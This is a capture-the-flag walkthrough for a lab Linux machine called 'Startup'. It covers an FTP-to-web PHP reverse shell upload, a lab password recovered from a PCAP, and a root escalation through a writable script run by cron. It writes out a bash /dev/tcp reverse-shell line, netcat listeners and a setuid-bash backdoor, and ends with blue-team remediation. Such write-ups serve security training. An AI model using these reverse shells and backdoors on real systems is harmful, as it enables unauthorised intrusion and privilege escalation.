Target IP: startup.thm (Requires /etc/hosts entry)
Difficulty: Easy
Objective: User (lennie) & Root (root.txt) Flags
1. Executive Summary
“Startup” is a Linux machine hosting a website under development. Initial access is gained by exploiting a writable Anonymous FTP directory that is also served by the Web Server, allowing for the upload and execution of a PHP reverse shell. Lateral movement involves analyzing a PCAP file found on the system to recover plaintext passwords. Privilege escalation exploits a custom script (planner.sh) executed by a root Cron job, which calls a second script (/etc/print.sh) that is writable by the user.
Key TTPs (MITRE ATT&CK):
- T1078 (Valid Accounts): Anonymous FTP and SSH credentials.
- T1190 (Exploit Public-Facing App): Uploading PHP webshell via FTP.
- T1040 (Network Sniffing): Analyzing PCAP files for credentials.
- T1053 (Scheduled Task/Job): Exploiting a writable script executed by Cron.
2. Operational Setup
Host Configuration
echo "10.10.x.x startup.thm" | sudo tee -a /etc/hosts3. Enumeration
A. Network Scanning
Nmap identifies three key services:
- 21/tcp (FTP): Anonymous login allowed, and the
ftpdirectory is writable. - 22/tcp (SSH): Open.
- 80/tcp (HTTP): Web server displaying a maintenance page.
B. Service Correlation (The Critical Link)
- FTP Inspection: We log in anonymously and see
important.jpgandnotice.txt. - Web Inspection: We fuzzy the web server and find
/files. - Correlation: Accessing
http://startup.thm/files/ftp/notice.txtconfirms that the files in the FTP server are hosted directly by the web server.
- Vulnerability: We can upload code via FTP and execute it via HTTP.
4. Initial Access: The Webshell
A. The Upload
We create a PHP reverse shell (e.g., PentestMonkey).
# On attacker machine
mv php-reverse-shell.php shell.php
# Edit shell.php with your IP and Port
# Connect to FTP
ftp startup.thm
> cd ftp
> put shell.phpB. The Trigger
- Start Listener:
nc -lvnp 4444. - Execute:
curl http://startup.thm/files/ftp/shell.php.
Status: Shell as www-data.
5. Lateral Movement: Forensics
A. Enumeration
Running linpeas.sh or manual exploration reveals a suspicious directory /incidents (or simply located at /).
- File:
suspicious.pcapng. - Action: We exfiltrate this file to our attacker machine (using python server or nc).
B. PCAP Analysis
We open the PCAP in Wireshark.
- Filter:
tcp.stream eq X(Right-click a packet -> Follow TCP Stream). - Findings: We see a user attempting to access a protected resource or log in.
- Credentials:
- User:
lennie - Password:
c4ntg3t3n0ughsp1c3
C. SSH Access
ssh lennie@startup.thm
# Password: c4ntg3t3n0ughsp1c3Status: User lennie.
6. Privilege Escalation: The Writable Script
A. Enumeration
In Lennie’s home directory, we see a folder ~/scripts.
ls -la ~/scripts
# -rwxr-xr-x 1 root root 77 planner.sh- Observation:
planner.shis owned by root. - Content:
#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh <-- INTERSTING CALL- Cron Check: Since we can’t see the cron as a user, we use pspy or infer from file timestamps that
planner.shis running every minute as root.
B. The Vulnerability
We check the permissions of the script being called, /etc/print.sh.
ls -la /etc/print.sh
# -rwxr-x--- 1 lennie lennie ... /etc/print.shCritical Flaw: The root script (planner.sh) calls a script owned by lennie (print.sh). Since we are lennie, we can modify print.sh.
C. Exploitation
We replace the contents of /etc/print.sh with a reverse shell.
echo "bash -i >& /dev/tcp/10.10.YOUR.IP/9001 0>&1" >> /etc/print.shNote: Or simply chmod +s /bin/bash if you want a simpler persistent backdoor.
Execution:
- Start listener:
nc -lvnp 9001. - Wait 60 seconds.
- Root Shell.
Root Flag: /root/root.txt.
7. Remediation (Blue Team)
- FTP Configuration:
- Disable Anonymous FTP upload.
- Critical: Never map an FTP upload directory to an executable Web directory (
/var/www/html). Use a separate storage location that does not execute PHP.
- Script Permissions:
- Scripts executed by root (via Cron) should verify that all dependencies and called scripts (
/etc/print.sh) are also owned by root and writable only by root.
- Sensitive Data:
- Remove forensic artifacts (
suspicious.pcapng) containing plaintext credentials from the production server.